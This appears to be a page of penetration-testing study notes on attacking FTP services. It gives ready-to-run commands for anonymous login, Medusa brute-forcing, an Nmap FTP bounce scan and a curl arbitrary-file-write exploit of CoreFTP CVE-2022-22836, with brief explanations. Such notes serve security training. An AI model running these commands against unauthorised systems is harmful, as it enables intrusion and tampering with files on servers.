search

2.FTP

hashtag
Manual FTP Connection

ftp <target_IP>

hashtag
Netcat FTP Connection

nc <target_IP> 21

hashtag
Anonymous Login (FTP Client)

ftp <target_IP>
Username: anonymous
Password: (Press Enter)

hashtag
Brute-Force (Medusa)

medusa -u <username> -P <password_list> -h <target_IP> -M ftp

hashtag
FTP Bounce Attack (Nmap)

nmap -Pn -v -n -p <target_port> -b anonymous:password@<ftp_server_IP> <internal_target_IP>

hashtag
CoreFTP Arbitrary File Write (curl)

curl -k -X PUT -H "Host: <target_IP>" --basic -u <username>:<password> --data-binary "Payload" --path-as-is https://<target_IP>/../../../../../../<filename>

hashtag
FTP Client Commands (Post-Login)

ls                     # List directory contents
cd <directory>         # Change directory
get <filename>         # Download a single file
mget <filename1> <filename2> # Download multiple files
put <local_filename>   # Upload a single file
mput <local_filename1> <local_filename2> # Upload multiple files
help                   # Show help for FTP commands

. FTP Basics

  • Function:

    • File transfer between computers.

    • Directory and file operations (list, rename, delete).

  • Port: TCP/21.

  • Attack Vectors:

    • Misconfigurations (anonymous access, excessive privileges).

    • Exploiting known vulnerabilities.

    • Discovering new vulnerabilities.

II. Enumeration

  • Nmap:

    • -sC (default scripts): ftp-anon script (anonymous login check).

    • -sV (version enumeration): FTP banner, version info.

    • Example: nmap -sC -sV -p 21 <target_IP>

  • Manual Interaction:

    • ftp client.

    • nc (netcat).

III. Misconfigurations

  • Anonymous Authentication:

    • Username: anonymous, no password.

    • Risks: Sensitive data access, malicious file uploads.

  • Access Control:

    • Incorrect read/write permissions.

IV. Protocol-Specific Attacks

  • Brute-Forcing:

    • Tools: Medusa (medusa -u <user> -P <passlist> -h <target> -M ftp).

    • Note: Password spraying is more effective.

  • FTP Bounce Attack:

    • Using an FTP server to scan internal network devices.

    • Nmap: -b anonymous:password@<FTP_server_IP> <internal_target_IP>.

    • Modern servers have protections, but misconfigurations exist.

V. Latest FTP Vulnerabilities (CVE-2022-22836 - CoreFTP)

  • Vulnerability:

    • Authenticated directory/path traversal.

    • Arbitrary file write.

  • Attack Method:

    • HTTP PUT request with directory traversal characters (../).

  • Exploitation:

    • curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

  • SPPD Breakdown:

    • Directory Traversal:

      • Source: Malicious HTTP PUT request.

      • Process: Misinterprets path.

      • Privileges: Bypass restrictions.

      • Destination: Local system (traversed directory).

    • Arbitrary File Write:

      • Source: Filename and content.

      • Process: Writes content.

      • Privileges: Allowed due to traversal.

      • Destination: Arbitrary file on the local system.

Points for Consideration:

  • Active vs. Passive FTP: Briefly mention the difference and security implications.

  • Secure FTP: Discuss SFTP and FTPS and their advantages.

  • FTP Tools: Expand on tools like lftp and FileZilla (for client side), and also vsftpd, and proftpd (for server side).

  • Real-World Examples: Add more examples of FTP misconfigurations and exploits.

  • Mitigation: Provide more detailed mitigation strategies for FTP vulnerabilities.

  • More Nmap script examples: There are many more useful ftp Nmap scripts.

  • More curl usage: There are many more ways to use curl to interact with FTP.

Previous1.Protocol-specific-attacksNext3.SMB

Last updated